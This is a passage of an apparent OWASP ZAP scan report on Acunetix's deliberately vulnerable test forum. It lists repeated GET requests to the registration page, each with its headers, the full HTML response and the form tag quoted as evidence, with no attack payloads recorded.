ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D63 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D63 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=63 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:08 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D63" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D64 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D64 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=64 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:08 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D64" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D65 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D65 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=65 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:08 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D65" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D66 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D66 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=66 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:08 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D66" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D67 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D67 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=67 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:09 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D67" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D68 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D68 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=68 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:09 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D68" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D69 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D69 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=69 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:09 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D69" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
Request Header - size: 374 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=7 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:01 GMT Content-Length: 3550 |
Response Body - size: 3,550 bytes. |
